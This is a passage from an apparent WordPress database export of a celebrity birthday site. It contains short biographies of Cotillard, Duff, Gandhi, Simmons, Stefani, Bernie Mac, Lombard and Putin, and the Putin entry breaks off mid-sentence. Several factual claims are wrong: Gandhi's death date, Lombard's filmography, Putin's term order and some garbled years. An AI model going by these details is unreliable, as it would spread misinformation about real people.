The couple had a son, Marcel, who was announced on May 19, 2011. Cotillard has also denied being married to Guillaume Canet in 2014.\r\n<h3>Where Are They Now</h3>\r\nIf her talented film work were not enough already. Cotillard has also been involved in other projects in recent years. In 2011 supported <a href=\"https://en.wikipedia.org/wiki/Raoni_Metuktire\" target=\"_blank\">Chief Raoni</a> publicly in his fight against the Belo Monte Dam in Braze and even signed his petition. She was featured in Kate Winslet\'s book “The Golden Hat: Talking Back To Autism” in 2012 with celebrity self portraits. In order to help raise support and awareness for autism launched by the Winslet\'s Golden Hat Foundation\r\n\r\nCotillard also signed “<a href=\"http://marion-cotillard.org/2014/02/27/marion-cotillard-joined-the-tiger-manifesto/\" target=\"_blank\">The Tiger Manifesto</a>” in February, 2014. The campaign\'s focus being to end the everyday products that are being manufactured that cause forest destruction.\r\n\r\n<a href=\"https://commons.wikimedia.org/wiki/File:Marion_Cotillard_2_(July_2009).jpg\" target=\"_blank\">Image Credit</a>\r\n\r\n ','Marion Cotillard','','publish','open','open','','marion-cotillard','','','2015-10-09 16:31:26','2015-10-09 16:31:26','',0,'http://birthdaypedia.com/?p=302',0,'post','',0),(303,2,'2015-09-29 15:04:49','2015-09-29 15:04:49','','Skylar Astin','','inherit','open','closed','','skylar-astin','','','2015-09-29 15:04:49','2015-09-29 15:04:49','',295,'http://birthdaypedia.com/wp-content/uploads/2015/09/Skylar-Astin.jpg',0,'attachment','image/jpeg',0),(304,2,'2015-09-29 15:28:34','2015-09-29 15:28:34','','Kevin Sorbo','','inherit','open','closed','','kevin-sorbo','','','2015-09-29 15:28:34','2015-09-29 15:28:34','',302,'http://birthdaypedia.com/wp-content/uploads/2015/09/Kevin-Sorbo.jpg',0,'attachment','image/jpeg',0),(306,2,'2015-09-29 15:33:56','2015-09-29 15:33:56','','Will Smith','','inherit','open','closed','','will-smith','','','2015-09-29 15:33:56','2015-09-29 15:33:56','',302,'http://birthdaypedia.com/wp-content/uploads/2015/09/Will-Smith.jpg',0,'attachment','image/jpeg',0),(307,2,'2015-09-29 16:17:28','2015-09-29 16:17:28','','Hilary Duff','','inherit','open','closed','','hilary-duff','','','2015-09-29 16:17:28','2015-09-29 16:17:28','',302,'http://birthdaypedia.com/wp-content/uploads/2015/09/Hilary-Duff.jpg',0,'attachment','image/jpeg',0),(308,2,'2015-09-29 16:26:19','2015-09-29 16:26:19','','Kevin Durant','','inherit','open','closed','','kevin-durant','','','2015-09-29 16:26:19','2015-09-29 16:26:19','',302,'http://birthdaypedia.com/wp-content/uploads/2015/09/Kevin-Durant.jpg',0,'attachment','image/jpeg',0),(309,2,'2015-09-29 16:31:17','2015-09-29 16:31:17','','Marion Cotillard','','inherit','open','closed','','marion-cotillard','','','2015-09-29 16:31:17','2015-09-29 16:31:17','',302,'http://birthdaypedia.com/wp-content/uploads/2015/09/Marion-Cotillard.jpg',0,'attachment','image/jpeg',0),(310,2,'2015-09-28 16:33:57','2015-09-28 16:33:57','<h3>In the Beginning</h3>\r\nHilary Duff was born on September 28, 1987 in <a href=\"http://www.houstontx.gov/\" target=\"_blank\">Houston, Texas</a>. Her parents are Susan Colleen who worked as a music and film producer after she was a homemaker for a while. Her father is Robert Duff whose a partner in a chain of convenience stores. Hilary was raised in San Antonio and Houston. Hilary\'s mother encouraged her and her sister to pursue their interests. Soon, both sisters were enrolled with ballet classes, acting, and singing. Together, they even earned a couple of roles in local theatre productions. Even participating in the touring BalletMet production for <em>The Nutcracker</em> in their hometown.\r\n\r\nTheir passion for show business continued to grow. The sisters and their mother moved to California in 1993. Their father remained in Houston to take care of his business. The Duff sisters continued to audition for a number of years. They were cast in a couple of television commercials. Due to Hilary\'s growing acting career she has been home schooled since the age of eight. The sisters have even modeled a couple of clothing brands too.\r\n\r\n“My sister and I really showed an interest in [performing] and dedication, and [our mother] was like, \'How can I tell my kids no?\' It\'s the same as kids that are going into sports. Parents support them and push them,” Hilary said about her upbringing.\r\n<h3>Career Accomplishments</h3>\r\nHilary\'s second studio album, <a href=\"http://www.rollingstone.com/music/albumreviews/metamorphosis-20030827\" target=\"_blank\">Metamorphosis</a> that was released in 2003, achieved commercial and critical success. Even topping the Billboard 200 and selling more than three million copies worldwide. She eventually achieved Platinum status due to her continued success in music. After she released her fourth album called Dignity in 200, she released a greatest hits album before she left Hollywood Records. Hilary even wrote and released a novel called <em>Elixir</em> in 2010 which rose to a N<em>ew York Times</em> best seller.\r\n<h3>Most Known For</h3>\r\nHilary is well known for her hit show <em><a href=\"http://www.imdb.com/title/tt0273366/\" target=\"_blank\">Lizzie McGuire</a></em>. She is also well known for other roles she\'s played in other movies such as <em>Cheaper by the Dozen </em>and <em>Agent Cody Banks</em>. Hilary did leave music for a time, but signed up with RCA Records and released her fifth studio album called <em>Breathe In, Breathe Out</em> this year. She has also received media attention for her friendships and romantic relationships. The romances Hilary had with Joel Madden and Aaron Carter were reported frequently in the media.\r\n<h3>Current Personal Life</h3>\r\nOn January 10, 2014 <a href=\"http://www.etonline.com/news/163342_hilary_duff_and_mike_comrie_divorce_just_got_more_complicated/\" target=\"_blank\">Comrie and Hilary</a> made the announcement they would be separating. However, they would continue to parent their son together. In February of 2015 she finally filed for a divorce from Comrie. Requesting she have primary legal and physical joint custody of their son. Citing a few differences for the reason of their divorce as well.\r\n<h3>Where Are They Now</h3>\r\nHilary continues to still do well in her acting and music carer. In November of 2014 she did voice work for the <em>Dora the Explorer</em> special in an episode where she did the voice of the Ice Witch. She also released her fifth studio album called <em>Breathe In, Breathe Out</em> on April 6, 2015. The lead single on the album, “Chasing the Sun” reached the No. 79 spot on the Billboard Hot 100.\r\n\r\nHilary has even involved herself in charitable activities too. She donated $250,000 in order to help the victims of Hurricane Katrina. Along with donating 2.5 million meals to the victims in 2005. In 2012, only a few months after she gave birth to her son, she became heavily involved in the <a href=\"http://www.celebritybabyscoop.com/2013/05/08/promotes-johnsons-campaign\" target=\"_blank\">Johnson\'s Baby Cares campaign</a>. Even to this day she continues to be involved in these activities.\r\n\r\n<a href=\"https://www.flickr.com/photos/tricksware/14645951624/sizes/l\" target=\"_blank\">Image Credit</a>\r\n\r\n ','Hilary Duff','','publish','open','open','','hilary-duff','','','2015-10-09 16:32:36','2015-10-09 16:32:36','',0,'http://birthdaypedia.com/?p=310',0,'post','',0),(313,2,'2015-10-02 08:57:23','2015-10-02 08:57:23','Ghandi, it\'s a name everyone knows. How much do people know about the man behind the name? Mahatama Ghandi is the former leader of India\'s independence movement. He has been hailed as the primary example for non-violent civil disobedience.\r\n<h2>In the Beginning</h2>\r\nGhandi was born on October 2, 1869 in <a href=\"https://en.wikipedia.org/wiki/Porbandar\" target=\"_blank\">Porbandar, India</a>. He went to school in Rajkot. At the time his father was serving as the prime minister or adviser for the local ruler. His father, Karamchand Ghandi, passed away before Ghandi finished his schooling. His mother was Putilabi. She was deeply religious and fasted on a regular basis. He grew up following <a href=\"http://www.religionfacts.com/jainism\" target=\"_blank\">Jainism</a>, the Indian religion that supports vegetarianism, non-violence, meditation, and fasting.\r\n\r\nAt the age of thirteen he did marry Kasturba, who was the same age as Ghandi himself. He decided to sail to England in 1888 to study law. As a young Indian he had a rough time adjusting to Western culture. He stayed in London for three years where he became even more dedicated to making sure his diet remained free of meat. Even joining the London Vegetarian Society.\r\n\r\nGhandi returned to India in 1891. Where he received the unfortunate news his mother had passed away a few weeks earlier before his return. Ghandi struggled as a lawyer. During his first courtroom case he came to a blank when he had to cross examine a witness. Ghandi left the courtroom, but later reimbursed his client for the legal fees. Ghandi managed to obtain a one year contract for performing legal services in South Africa.\r\n\r\nIt was not until South Africa Ghandi began to show signs of his true calling. He was shocked by the racial segregation and discrimination of his country men at the hands of white Boer and British authorities. During first time in a Durban courtroom, Ghandi was asked to take off his turban. He refused and exited the courtroom. Later The Natal Advertiser made a mockery of Ghandi\'s refusal in print by labeling Ghandi as “an unwelcome visitor.”\r\n<h2>Career Accomplishments</h2>\r\nOn June 7, 1893 on a trip to Pretoria. There was a white man who objected to Ghandi\'s presence in the first class railway compartment. Despite the fact Ghandi had his ticket. He refused to move to the back of the train. Ghandi was forcibly taken from the train and tossed out of the station in Pietermaritzburg. In 1894, he formed the <a href=\"http://www.sahistory.org.za/organisations/natal-indian-congress-nic\" target=\"_blank\">Natal Indian Congress</a> in his fight against discrimination. During the Boer War he was able to raise an all Indian ambulance corps which consisted of 1,100 volunteers who supported the British cause.\r\n<h2>Most Known For</h2>\r\n<img class=\"alignleft wp-image-315 size-medium\" title=\"Mahatma Ghandi\" src=\"http://birthdaypedia.com/wp-content/uploads/2015/10/Mahatma-Ghandi-221x300.jpg\" alt=\"Mahatma Ghandi\" width=\"221\" height=\"300\" />Ghandi returned to his homeland, India, in 1914 while it was still under British control. At this time he founded the ashram known as Ahmedabad which was open to all castes. He wore a shawl and loincloth. Living a strict life devoted to meditation, prayer, and fasting. It was during this time he soon became known as “Mahatama” or “the great souled one.” He soon became a leader for the <a href=\"https://en.wikipedia.org/wiki/Indian_independence_movement\" target=\"_blank\">Indian independence movement</a>. He called for people to stop purchasing and paying taxes for British goods, mass boycotts, students to stop attending the government schools, and more.\r\n\r\nDuring the Salt Acts set in in place by Britain in 1930. Ghandi planned another Satyagraha campaign that involved a 240 mile trek to the Arabian Sea. There he would collect the salt as a symbol of defiance for the government\'s monopoly on salt. He was imprisoned, but later released in May of the same year. Time magazine named Ghandi “Man of the Year” in 1930. In August 1931, he was the only representative of the Indian National Congress at the London Round Table Conference.\r\n<h2>Current Personal Life</h2>\r\nOn January 20, 1948 Ghandi was 78 years old. His two nieces were leading him back to his home in New Delhi\'s Birla House for a prayer meeting. Nathuram Godse, a Hind extremist, knelt in front of Ghandi. He then pulled out a semiautomatic pistol and shot Ghandi at point blank range three times. Ghandi died and Godse along with a fellow co-conspirator were executed in November 1949. Other conspirators were later sentenced to life in prison.\r\n<h2>Where Are They Now</h2>\r\nDespite his death on January 20, 1948 <a href=\"http://www.unesco.org/new/en/education/resources/online-materials/single-view/news/gandhis_legacy_lives_on/#.Vg6D5XqqpBc\" target=\"_blank\">Ghandi\'s legacy</a> of non-violence lives on. His belief for simple living for eating a vegetarian diet, making his own clothes, and the self-purification he used to protest. Have continued to be a symbol of hope for people around the world. Satyagraha continues to remain a potent philosophy about freedom struggles even to this day. Ghandi\'s actions inspired a few human rights movements around the world too. Including Nelson Madela in South Africa and Martin Luthor King Jr. in the United States.\r\n\r\n[<a href=\"https://www.flickr.com/photos/number10gov/16623989210/sizes/z/\" target=\"_blank\">Image 1</a>] [<a href=\"https://commons.wikimedia.org/wiki/File:Mohandas_K._Gandhi,_portrait.jpg\" target=\"_blank\">Image 2</a>]\r\n\r\n ','Ghandi (1869 - 1948)','','publish','open','open','','ghandi-1869-1948','','','2015-10-08 17:52:48','2015-10-08 17:52:48','',0,'http://birthdaypedia.com/?p=313',0,'post','',1),(314,2,'2015-10-02 13:22:47','2015-10-02 13:22:47','','Ghandi','','inherit','open','closed','','ghandi','','','2015-10-02 13:22:47','2015-10-02 13:22:47','',313,'http://birthdaypedia.com/wp-content/uploads/2015/10/Ghandi.jpg',0,'attachment','image/jpeg',0),(315,2,'2015-10-02 13:22:50','2015-10-02 13:22:50','','Mahatma Ghandi','','inherit','open','closed','','mahatma-ghandi','','','2015-10-02 13:22:50','2015-10-02 13:22:50','',313,'http://birthdaypedia.com/wp-content/uploads/2015/10/Mahatma-Ghandi.jpg',0,'attachment','image/jpeg',0),(320,2,'2015-10-02 16:46:04','2015-10-02 16:46:04','','Gwen Stefani','','inherit','open','closed','','gwen-stefani-2','','','2015-10-02 16:46:04','2015-10-02 16:46:04','',0,'http://birthdaypedia.com/wp-content/uploads/2015/10/Gwen-Stefani.jpg',0,'attachment','image/jpeg',0),(321,2,'2015-10-02 16:46:14','2015-10-02 16:46:14','','Gwen','','inherit','open','closed','','gwen','','','2015-10-02 16:46:14','2015-10-02 16:46:14','',0,'http://birthdaypedia.com/wp-content/uploads/2015/10/Gwen.jpg',0,'attachment','image/jpeg',0),(323,2,'2015-10-04 07:09:48','2015-10-04 07:09:48','Russell Simmons is the hip-hop master who carries a lot of influence. He has been able to cross market just about everything from social action to music. He\'s led a cultural movement in his lifetime, and has continued to be a huge influence even today.\r\n<h2>In the Beginning</h2>\r\nRussell Simmons was born on October 4, 1957 in New York City. He grew up in Queens, and in his youth balanced on the edge of gang life. He heard his true calling when he was introduced to rap music. During the 1970s the rhymes and beats of rap had begun to emerge from the grim African American neighborhoods of New York City.\r\n\r\nSimmons attended the City College of New York for a while until he decided to leave. Instead, he promoted local musicians like <a href=\"https://en.wikipedia.org/wiki/Run%E2%80%93D.M.C.\" target=\"_blank\">Run-D.M.C.</a> And <a href=\"http://www.biography.com/people/kurtis-blow-5444\" target=\"_blank\">Kurtis Blow</a>. He partnered up with Rick Rubin in 1984. Together they founded Def Jam Recordings. Kicking off the new cultural revolution that soon became known as hip hop.\r\n\r\nRussell Simmons was ambitious, and didn\'t stop with Def Jam Recordings. He had the Rush Communications firm which included an advertising agency, Phat Farm clothing company, a magazine agency, television shows, and a management company. Even his movie production company did well. Producing some timeless films like <em>The Nutty Professor</em> and <em>Krush Groove</em>.\r\n<h2>Career Accomplishments</h2>\r\nSimmons sold his stake on <a href=\"http://www.defjam.com/\" target=\"_blank\">Def Jam Records</a> to the Universal Music Group in 1999. They bought his stake for $100 million dollars. In 2004, he also sold Phat Farm for a hefty $140 million. Simmons was also a huge influence in telling rappers to stay true to their rhymes and styles. He stood in the middle of growth of hip hop too. Lobbying MTV to put Run-DMC videos on the air. Even having rappers to record a song with Aerosmith. At one point he even launched cable program called “Russell Simmons\' Def Comedy Jam” that ran for seven years. The show helped to launch a new generation of black comedians like Chris Rock and Bernie Mac.\r\n<h2>Most Known For</h2>\r\n<img class=\"alignright wp-image-326 size-medium\" title=\"Russell Simmons\" src=\"http://birthdaypedia.com/wp-content/uploads/2015/10/Russell_Simmons-200x300.jpg\" alt=\"Russell Simmons\" width=\"200\" height=\"300\" />Russell Simmons is best known as the master of cross marketing. He has been at the head of the <a href=\"http://www.britannica.com/topic/hip-hop\" target=\"_blank\">hip hop movement</a>. Helping to produce an entire new generation of rappers, comedians, and even welcoming white audiences. He took the cultural expression of his minority and was able to turn it around into a fruitful business. Through him several black artists found an entire international audience to listen to them and their work. He has stated there is a rich diversity among blacks. As Simmons puts it:\r\n\r\n“The truth is that everybody doesn\'t look like Bill Cosby, and we need to hear the truth, and see the truth, in order for us to know where we\'re going, and what our problems are.”\r\n<h2>Current Personal Life</h2>\r\nSimmons later married the model <a href=\"https://en.wikipedia.org/wiki/Kimora_Lee_Simmons\" target=\"_blank\">Kimora Lee</a> in 1998. The couple divorced in 2008. Their two daughters are named Aoki and Ming. He is a yoga enthusiast and sticks to a vegan diet. He\'s an active philanthropist as well. In 2002 he also wrote a biography he calls “Life and Def: Sex, Drugs, Money and God.”\r\n<h2>Where Are They Now</h2>\r\nSimmons is involved in other projects. He\'s an animal rights activist and supports PETA. He was even the recipient for the <a href=\"http://www.peta.org/\" target=\"_blank\">PETA</a> Humanitarian Award in 2001. Simmons has also been named the Goodwill Ambassador to fight HIV/AIDS, war, and poverty. He helped to found the Hip Hop Summit Action Network, the Foundation for Ethnic Understanding, and the Rush Philanthropic Organization. He even wrote book called “Do You! 12 Laws To Access The Power In You To Achieve Happiness And Success.”\r\n\r\n[<a href=\"https://www.flickr.com/photos/un_photo/3550004414/sizes/z/\" target=\"_blank\">Image 1</a>] [<a href=\"https://commons.wikimedia.org/wiki/File:Russell_Simmons.jpg\" target=\"_blank\">Image 2</a>]\r\n<h2 style=\"text-align: center;\">Do you share a birthday with Russell Simmons?</h2>','Russell Simmons (1957 – Present)','','publish','open','open','','russell-simmons','','','2015-10-09 16:27:38','2015-10-09 16:27:38','',0,'http://birthdaypedia.com/?p=323',0,'post','',0),(324,2,'2015-10-02 17:16:14','2015-10-02 17:16:14','','Russell Simmons','','inherit','open','closed','','russell-simmons-2','','','2015-10-02 17:16:14','2015-10-02 17:16:14','',323,'http://birthdaypedia.com/wp-content/uploads/2015/10/Russell-Simmons.jpg',0,'attachment','image/jpeg',0),(325,2,'2015-10-03 12:00:23','2015-10-03 12:00:23','Gwent Stefani is a famous American singer, fashion designer, and songwriter. She gained popularity in the 1990s during her time as the lead singer for <em><a href=\"http://www.nodoubt.com/\" target=\"_blank\">No Doubt</a></em>. Ever since she has gone on to have a successful solo career and even launched her own line of clothes. What\'s behind the talent of this highly skilled diva?\r\n<h2>In the Beginning</h2>\r\nGwen Stefani was born on October 3, 1969 in <a href=\"http://ocgov.com/\" target=\"_blank\">Orange County, California</a>. She grew up in the Southern part of California alongside her two brothers Eric and Todd. In her early years, Gwen was influenced by the growing popularity of punk and ska music.\r\n\r\nHer passion for music that would ultimately lead to her successful career started when her brother Eric started a band called <em>No Doubt </em>alongside his friend John Spence. The band was formed in 1987, and Gwen joined as a co-vocalist. Tony Kanal later joined them, and together they started to grow in popularity by playing at parties in Orange County.\r\n\r\nUnfortunately, Spence committed suicide in 1987. Gwen became the new lead singer for the band despite the loss. The band stayed in Orange County for several more years performing at local clubs. Finally, they were able to sign a deal with a record label called Interscope. In 1992, they released their self-tilted album. The album turned out to be a flop, and then Gwen\'s relationship with Kanal ended towards the end of 1993. However, this did not mean the end for Gwen Stefani\'s music career.\r\n<h2>Career Accomplishments</h2>\r\nAs Gwen started to emerge as a multi-talented star. It didn\'t begin to show until 2001. She won her first Grammy Award due to her work with Eve for the Best Rap/Sung Collaboration. In the same year, when <em>No Doubt</em> released their new album <em>Rock Steady, </em>the band won two Grammy Awards for the songs on their album. “Underneath it All” and “Hey Baby” each won the Best Pop Performance by a Duo or Group with Vocal in 2002. She even received a Grammy nomination for her solo effort, <em>The Sweet Escape,</em> when it became a huge hit.\r\n<h2>Most Known For</h2>\r\n<img class=\"alignright wp-image-321 size-medium\" title=\"Gwen Stefani\" src=\"http://birthdaypedia.com/wp-content/uploads/2015/10/Gwen-225x300.jpg\" alt=\"Gwen Stefani\" width=\"225\" height=\"300\" />Gwen rejoined the band <em>No Doubt</em> in 2012. Currently, many fans associate Gwen Stefani with <em><a href=\"https://en.wikipedia.org/wiki/The_Voice_(U.S._TV_series)\" target=\"_blank\">The Voice</a></em>. She signed onto the show to be a judge for their reality competition. She is also famous for her own clothing line, L.A.M.B. and playing a role as the sex symbol, Jean Harlow, in the film <em>The Aviator</em> released in 2004.\r\n<h2>Current Personal Life</h2>\r\nGwen Stefani and Gavin Rossdale welcome their son, Kingston James McGregor Rossdale, in the world on May 26, 2006. They had a second son they named Zuma Nesta Rock who was born on August 21, 2008. Their third son, Apollo Bowie Flynn Rossdale, came into the world on February 28, 2014. In August of 2015 though the couple called it quits. They made the announcement they would be filing for divorce.\r\n<h2>Where Are They Now</h2>\r\nGwen Stefani is a judge for the reality competition known as <em>The Voice</em>. She in the process of divorcing <a href=\"https://en.wikipedia.org/wiki/Gavin_Rossdale\" target=\"_blank\">Gavin Rossdale</a>, despite the couple being together for several years. After she reunited with her band mates, <em>No Doubt</em>, in 2012. They did announce a new album called <em>Push and Shove</em> the same year they got back together. At the current moment the band is focused on regaining their lost success by taking up a tour and promotional schedule.\r\n\r\n[<a href=\"https://www.flickr.com/photos/corruptkitten/1009246090/sizes/z/\" target=\"_blank\">Image 1</a>]\r\n<h2 style=\"text-align: center;\">Do you share Gwen Stefani\'s birthday?</h2>','Gwen Stefani','','publish','open','open','','gwen-stefani-birthday','','','2015-10-08 18:23:58','2015-10-08 18:23:58','',0,'http://birthdaypedia.com/?p=325',0,'post','',0),(326,2,'2015-10-02 19:38:13','2015-10-02 19:38:13','','Russell_Simmons','','inherit','open','closed','','russell_simmons','','','2015-10-02 19:38:13','2015-10-02 19:38:13','',323,'http://birthdaypedia.com/wp-content/uploads/2015/10/Russell_Simmons.jpg',0,'attachment','image/jpeg',0),(327,2,'2015-10-05 09:34:37','2015-10-05 09:34:37','Bernie Mac is a famous actor and standup comedian. Many people know his face and his name. He\'s appeared in countless films, on television, and perhaps his most famous is his television show “<a href=\"http://www.imdb.com/title/tt0285341/\" target=\"_blank\">Bernie Mac Show</a>.\" He even made an appearance in the “Ocean\'s 11” films. Despite his untimely death, there are many fans who still enjoy his work even today.\r\n<h2>In the Beginning</h2>\r\nBernie Mac (his real name is Bernard Jeffrey McCollough) was born on October 5, 1957 in Chicago, Illinois. He grew up in a rough neighborhood along with a large family. All of them living under one roof. His situation helped to give him insight into his surroundings, comedy, and even his family. Mac sought out work at the Regal Theater. Performing in Chicago Park in his youth. He didn\'t become a professional comedian until he was 19 years old in 1977. His refusal to change the image he had for films and television set him back a bit in the 1980s.\r\n\r\nBernie Mac finally came to the big screen when he played a small role in the movie <em>Mo\' Money</em> in 1992. Soon after he began to play a wide range of small parts in comedies and movies. When he began to make appearances on <a href=\"https://en.wikipedia.org/wiki/Def_Comedy_Jam\" target=\"_blank\">HBO\'s Def Comedy Jam</a> in the 1990s. It helped to get him in the door of the becoming the comedian most people are familiar with today.\r\n<h2>Career Accomplishments</h2>\r\nMac had a unique flair to his comedy. It was edgy, and at first it didn\'t seem as if it would pair with with television. After he made several appearances in the series Moesha. He gained wide acclaim and starred in <em><a href=\"http://www.imdb.com/title/tt0236388/\" target=\"_blank\">The Original Kings of Comedy</a></em> in 2000. The performance helped to bolster his reputation as a comedian and to further his career. His show, called <em>The Bernie Mac Show</em>, earned him Golden Globe and Emmy nominations.\r\n<h2>Most Known For</h2>\r\n<img class=\"alignright wp-image-330\" title=\"Bernie Mac\" src=\"http://birthdaypedia.com/wp-content/uploads/2015/10/Bernie_Mac.jpg\" alt=\"Bernie Mac\" width=\"174\" height=\"293\" />Bernie is mostly recognized for his TV show that aired on Fox in 2001 – 2006. It was called <em>The Bernie Mac Show</em>. The show as based on his family experiences. In the show he played the role of a dad who found himself having adopted three kids. He starred in the roles of a few films as well such as <em>Charlie\'s Angels: Full Throttle</em> in 2003. He played the role of an aging baseball hero in the movie <em>Mr. 3000</em>.\r\n<h2>Personal Life</h2>\r\nBernie Mac passed away on August 9, 2008 due to pneumonia. A memorial service was held for him at the House of Hope Church on Chicago\'s South Side. Over 6,000 people attended the memorial service to honor his memory. Mac also suffered from other medical complications. He had <a href=\"http://www.scientificamerican.com/article/experts-sarcoidosis-bernie-mac/\" target=\"_blank\">sarcoidosis</a>, which is an inflammatory lung disease. The disease products tiny lumps in the cells of the body. Sadly, he went into remission in 2005. Before his death he was taken to the hospital to be treated for pneumonia, but it was not related to his disease.\r\n<h2>Legacy</h2>\r\nOne reason for Bernie Mac\'s success is how he was able to draw people in. His comedy was about the tough experiences he had as a black man. His mainstream appeal reached a wide range of audiences young and old. People laughed at his jokes and were able to feel connected with him. Rising from a poor childhood to the stage. Bernie Mac believed laughter could heal. Despite his passing his jokes from his show and his standup comedy are still relevant to this day. George Clooney, the co-star for “Ocean\'s 11” summed up Bernie Mac\'s passing perfectly:\r\n\r\n“The world just got a little less funny.”\r\n\r\n[<a href=\"https://en.wikipedia.org/wiki/File:BernieMacSoulMenMarch08.jpg\" target=\"_blank\">Image 1</a>] [<a href=\"https://en.wikipedia.org/wiki/File:BernieMacTransformersPremiereJune07.jpg\" target=\"_blank\">Image 2</a>]\r\n<h2 style=\"text-align: center;\">Do you share a birthday with Bernie Mac?</h2>','Bernie Mac (1957 – 2008)','','publish','open','open','','bernie-mac-birthday','','','2015-10-14 14:16:03','2015-10-14 14:16:03','',0,'http://birthdaypedia.com/?p=327',0,'post','',0),(328,2,'2015-10-06 08:34:40','2015-10-06 08:34:40','Carole Lombard was a talented actress who passed away before her time. She played many roles in comedic films during the 1930s. She married another actor while she was alive named <a href=\"https://en.wikipedia.org/wiki/Clark_Gable\" target=\"_blank\">Clark Gable</a> 1939. A few short years later she died in a plane <a href=\"http://www.history.com/this-day-in-history/carole-lombard-killed-in-plane-crash\" target=\"_blank\">crash accident</a>.\r\n<h2>In the Beginning</h2>\r\nCarole Lombard (the real name she was born with is Jane Alice Peters) was born on October 6, 1908 in <a href=\"http://www.cityoffortwayne.org/\" target=\"_blank\">Fort Wayne, Indiana</a>. Her parents filed for divorce in 1916. Carole moved out West after her mother took the family for a trip, and they decided to make a home in the Los Angeles area. Carole was spotted while she was playing baseball with a couple of neighborhood boys. The film direction who spotted her had her sign a one picture contract in 1921. Carole was only twelve at the time, and starred in the film <em>A Perfect Crime</em> later that year.\r\n\r\nCarole did start to try out for a couple of acting jobs, but would not appear on the screen again until four years later. For a time Carole lived a normal life. She went to school, excelled in field and track, and participated in athletics. When she fifteen she grew fed up with school and quit instead. Carole joined a theater troupe for a time and even played in a couple of stage shows.\r\n\r\nIn 1925, she managed to pass a screen test and sign a contract with Fox Films. Starting her new (but short) acting career.\r\n<h2>Career Accomplishments</h2>\r\nAfter she signed up with Fox Films, Carole went on to star in the lead role of the film <em>Hearts and Spurs</em>. In 1926, she was in a car accident that left scarring on her face. Due to this Fox canceled the contract they had with her. Carole didn\'t let the setback dissuade her from pursuing her acting career though. She went on with making films, and transitioned well from silent films to the “talkies” too.\r\n\r\nThe first film she starred in was called <em><a href=\"http://www.imdb.com/title/tt0019983/\" target=\"_blank\">High Voltage</a></em>. Carole starred in a movie alongside William Powell in the film <em>Man of the World</em> in 1931.\r\n<h2>Most Known For</h2>\r\n<img class=\"alignleft wp-image-332 size-medium\" title=\"Carole Lombard\" src=\"http://birthdaypedia.com/wp-content/uploads/2015/10/Carole_Lombard-227x300.jpg\" alt=\"Carole Lombard\" width=\"227\" height=\"300\" />Carole enjoyed some success in the early 1930s, but her career did not truly take off until 1934. Howard Hanks, a director, thought Carole was perfect for the next film he was working on. She appeared in the <em>Twentieth Century</em> alongside John Barrymore. The role helped her to finally reach the limelight. During the same year she also starred in the film <em>It Happened One Night</em>. She managed to develop a strong reputation as a comedy actress once she starred in the film “Hands Across the Table” in 1935. She even earned herself an <a href=\"http://www.imdb.com/name/nm0001479/awards\" target=\"_blank\">Oscar nomination for Best Actress</a> for the role she played in <em>My Man Godfrey</em>.\r\n\r\nCarole only ever starred in one film in technicolor. It was called <em>Nothing Sacred</em> and she starred in the film in 1937.\r\n<h2>Personal Life</h2>\r\nIn 1941 is when America participated in World War II. Carole returned home to Indiana in order to attend a war bond rally. During her return home to California the tragic accident occurred. The play carrying Carole, her mother, and 20 other passengers crashed. It killed everyone on the plane.\r\n<h2>Legacy</h2>\r\nDue to her unfortunate passing long before her time. Carole Lombard still left behind a promising career where she no doubt would have become a legend had she survived the plane crash. The last film she ever starred in, <em>To Be or Not To Be</em> in 1942, ended up being her most successful film to date.\r\n\r\n[<a href=\"https://www.flickr.com/photos/bswise_/2931163968/sizes/o/\" target=\"_blank\">Image 1</a>] [<a href=\"https://www.flickr.com/photos/johnmcnab/3241524724/sizes/o/\" target=\"_blank\">Image 2</a>]\r\n\r\n ','Carole Lombard (1908 – 1942)','','publish','open','open','','carole-lombard-1908-1942','','','2015-10-06 21:42:56','2015-10-06 21:42:56','',0,'http://birthdaypedia.com/?p=328',0,'post','',0),(329,2,'2015-10-05 12:45:25','2015-10-05 12:45:25','','Bernie Mac','','inherit','open','closed','','bernie-mac','','','2015-10-05 12:45:25','2015-10-05 12:45:25','',327,'http://birthdaypedia.com/wp-content/uploads/2015/10/Bernie-Mac.jpg',0,'attachment','image/jpeg',0),(330,2,'2015-10-05 12:45:32','2015-10-05 12:45:32','','Bernie_Mac','','inherit','open','closed','','bernie_mac','','','2015-10-05 12:45:32','2015-10-05 12:45:32','',327,'http://birthdaypedia.com/wp-content/uploads/2015/10/Bernie_Mac.jpg',0,'attachment','image/jpeg',0),(331,2,'2015-10-05 13:28:25','2015-10-05 13:28:25','','Carole Lombard','','inherit','open','closed','','carole-lombard','','','2015-10-05 13:28:25','2015-10-05 13:28:25','',328,'http://birthdaypedia.com/wp-content/uploads/2015/10/Carole-Lombard.jpg',0,'attachment','image/jpeg',0),(332,2,'2015-10-05 13:28:31','2015-10-05 13:28:31','','Carole_Lombard','','inherit','open','closed','','carole_lombard','','','2015-10-05 13:28:31','2015-10-05 13:28:31','',328,'http://birthdaypedia.com/wp-content/uploads/2015/10/Carole_Lombard.jpg',0,'attachment','image/jpeg',0),(341,2,'2015-10-07 13:54:08','2015-10-07 13:54:08','Born into a less than noble situation, Vladimir Putin is the current President of Russia, having attained that rank on May 7, 2012. He succeeded <a href=\"https://en.wikipedia.org/wiki/Dmitry_Medvedev\" target=\"_blank\">Dmitry Medvedev</a> and served several non-consecutive terms. He served as President during 2000 to 2008, then became Prime Minister from 1999 to 2000. He retook office in 20120.\r\n<h2>In the Beginning</h2>\r\nEverything has to start somewhere, and the story of Vladimir Putin is no different. Unlike many world leaders today, he did not come from wealth and he did in fact work hard to achieve his current position. He was born October 7, 1952 in the city of <a href=\"https://en.wikipedia.org/wiki/Saint_Petersburg\" target=\"_blank\">Leningrad</a>. Born to an ordinary family, his mother served as a housewife, and his father fought in the second World War. Later on, he would take on a job as a security guard and then a foreman at the carriage works.\r\n\r\nEarly in his life, Putin made the decision to practice martial arts, or Judo, in particular, though his mother certainly did not approve. Despite that, he continued and made great strides, eventually earning the approval of his entire family.\r\n\r\nThe behavioral history of Putin in school was spotted, to say the least. He was very unfocused originally, but his teacher makes the recollection:\r\n\r\n<em>“In the fifth grade, he still hadn’t found himself yet, but I could feel the potential, the energy and the character in him. I saw that he had a great deal of interest in language; he picked it up easily. He had a very good memory and an agile mind. I thought, something good will come of this boy, so I decided to give him more attention, to distract him from the boys on the streets.” – Vera Gurevich</em>\r\n\r\nWhen Putin entered the sixth grade he did not seem interested in studying and placed more priority on playing sports than anything else. At some point however he made the decision that he wanted to accomplish something in life, which is why he began to get better grades and put his talent to better use. In addition to that, he would join the \"Young Pioneers\" organization, and almost 